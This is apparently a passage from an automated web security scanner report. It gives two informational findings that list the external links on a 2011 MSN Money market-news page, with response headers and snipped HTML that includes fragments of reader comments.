<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xpo_Bpo7oVutnP7wu82moHfnsEkcGreBB?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
ck markets? Buying, selling, gambling, lying, stealing, deceiving, manipulating, cutthroating, back stabbing and head chopping,.... you know, the usual routine that goes on everyday at "Fraud Street". <img src="http://us.social.s-redacted/s/images/emoticons/75_75.gif" alt="Eye-rolling" class="emoticon" /></div>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xq0tm3KzL1oq6JFh44a58UPpPNYNAeqHB?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XSN8F5eJocNcl3QJnJ85WhK7gl5LCHOLY?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XS98j_oegJAb0IvDZ9ZtLLsKvWvLQM86S?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xnro6l_39mWfG4y1hE7LEgx_WqLpHdupL?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=history+of+the+gold+standard&form=MONEY3" class="opennew">The history of the gold standard</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.202. http://money.redacted/market-news/post.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/market-news/post.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110128192402_charlie-blaine-164-b.jpg
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://us.social.s-msn.com/s/images/bluemannxl.png
http://us.social.s-msn.com/s/images/emoticons/72_72.gif
http://us.social.s-msn.com/s/images/emoticons/coffee.gif
http://us.social.s-msn.com/s/images/emoticons/regular_smile.gif
http://us.social.s-msn.com/s/images/emoticons/shades_smile.gif
http://us.social.s-msn.com/s/images/emoticons/thumbs_up.gif
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=history+of+the+gold+standard&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410071&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fmarket-news%2Fpost.aspx%3Fpost%3Dfaf89f05-0560-4409-bafb-7a02dc2c6cb5&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:54:30 GMT
Content-Length: 116786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410071&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fmarket-news%2Fpost.aspx%3Fpost%3Dfaf89f05-0560-4409-bafb-7a02dc2c6cb5&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<div class="pst_bod" id="abody"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110128192402_charlie-blaine-164-b.jpg" alt="Charley Blaine" class="imagefloatleft userImage lead" /><b>
...[SNIP]...
lBinary', 'True','1');" href="http://money.msn.com/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
y', 'True','0');" href="http://money.msn.com/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJtNqJBT2IezhkgeuRuClb2a_4QPIhAFx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XU7pDky3lWmpb7MTWgZ87L8mEzadYZfdK?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xnro6l_39mWfG4y1hE7LEgx_WqLpHdupL?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p>The times, they are changing, but much stays the same <img src="http://us.social.s-redacted/s/images/emoticons/regular_smile.gif" alt="Smile" class="emoticon" /></p>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XU7pDky3lWmpb7MTWgZ87L8mEzadYZfdK?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJtNqJBT2IezhkgeuRuClb2a_4QPIhAFx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGtFMSV9nRsLXf6vWuvijvpCsvi130Wc-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p><img src="http://us.social.s-redacted/s/images/emoticons/thumbs_up.gif" alt="Thumbs up" class="emoticon" /></p>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGtFMSV9nRsLXf6vWuvijvpCsvi130Wc-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p><img src="http://us.social.s-redacted/s/images/emoticons/72_72.gif" alt="Thinking" class="emoticon" /> interesting post hope gone.  we think this end of federal employment benefits combined with muni defaults will have a more severe impact than predicted by most. that said, we can still be be
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGtFMSV9nRsLXf6vWuvijvpCsvi130Wc-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p><img src="http://us.social.s-redacted/s/images/emoticons/shades_smile.gif" alt="Hot" class="emoticon" /> wow, i am quite stunned by the superlative quality of the posts by hava (the leadoff), buzzy (bubbles are made to be burst by bears), bull rider (i didn't learn that lesson about too much educati
...[SNIP]...
i Klein - The Rise of Disaster Capitalism.  this is all set up purposefully to continue the massive global transfer of wealth among the elites.  wake up and breathe deeply folks ....... <img src="http://us.social.s-redacted/s/images/emoticons/coffee.gif" alt="Coffee cup" class="emoticon" />  </p>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGtFMSV9nRsLXf6vWuvijvpCsvi130Wc-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p><img src="http://us.social.s-redacted/s/images/emoticons/72_72.gif" alt="Thinking" class="emoticon" /> now how can someone who is so right about the best personal armament (SA XD) not understand that we have in place a social democracy and that hitler and stalin were very far from either "socialis
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XnsEzD802_f4COcAl2sMs2OXQ38e5NBT6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xxb4-1Dy08C7YfTxwSLPMuVw7rrLTmQ4Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xxb4-1Dy08C7YfTxwSLPMuVw7rrLTmQ4Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XIuRaXU6OdMGt1DPaz47_ilsrPj8q2cj4?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X19kLPwdz5sB2Fnf9yuXWOdr9kOtEAGL6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xnro6l_39mWfG4y1hE7LEgx_WqLpHdupL?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XhfDJa04FoRujoDJi4C1LEoyMkBUSqiKS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xj0dHfUYtwaLtz5YCWnr-VnjhGC9rBkYC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=history+of+the+gold+standard&form=MONEY3" class="opennew">The history of the gold standard</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.203. http://money.redacted/market-news/post.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/market-news/post.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://cid-72bd862dcafebd15.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110128192402_charlie-blaine-164-b.jpg
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://us.social.s-msn.com/s/images/bluemannxl.png
http://us.social.s-msn.com/s/images/emoticons/72_72.gif
http://us.social.s-msn.com/s/images/emoticons/coffee.gif
http://us.social.s-msn.com/s/images/emoticons/shades_smile.gif
http://us.social.s-msn.com/s/images/emoticons/thumbs_up.gif
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=history+of+the+gold+standard&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406250&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fmarket-news%2Fpost.aspx%3Fpost%3Dfaf89f05-0560-4409-bafb-7a02dc2c6cb5&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=2355a213b1b04e8993d97dc35a8e9833; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 16:50:49 GMT
Content-Length: 116106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406250&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fmarket-news%2Fpost.aspx%3Fpost%3Dfaf89f05-0560-4409-bafb-7a02dc2c6cb5&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<div class="pst_bod" id="abody"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110128192402_charlie-blaine-164-b.jpg" alt="Charley Blaine" class="imagefloatleft userImage lead" /><b>
...[SNIP]...
lBinary', 'True','1');" href="http://money.msn.com/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
y', 'True','0');" href="http://money.msn.com/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XU7pDky3lWmpb7MTWgZ87L8mEzadYZfdK?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJtNqJBT2IezhkgeuRuClb2a_4QPIhAFx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGtFMSV9nRsLXf6vWuvijvpCsvi130Wc-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p><img src="http://us.social.s-redacted/s/images/emoticons/thumbs_up.gif" alt="Thumbs up" class="emoticon" /></p>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGtFMSV9nRsLXf6vWuvijvpCsvi130Wc-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p><img src="http://us.social.s-redacted/s/images/emoticons/72_72.gif" alt="Thinking" class="emoticon" /> interesting post hope gone.  we think this end of federal employment benefits combined with muni defaults will have a more severe impact than predicted by most. that said, we can still be be
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGtFMSV9nRsLXf6vWuvijvpCsvi130Wc-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<p><img src="http://us.social.s-redacted/s/images/emoticons/shades_smile.gif" alt="Hot" class="emoticon" /> wow, i am quite stunned by the superlative quality of the posts by hava (the leadoff), buzzy (bubbles are made to be burst by bears), bull rider (i didn't learn that lesson about too much educati
...[SNIP]...
i Klein - The Rise of Disaster Capitalism.  this is all set up purposefully to continue the massive global transfer of wealth among the elites.  wake up and breathe deeply folks ....... <img src="http://us.social.s-redacted/s/images/emoticons/coffee.gif" alt="Coffee cup" class="emoticon" />  </p>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGtFMSV9nRsLXf6vWuvijvpCsvi130Wc-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
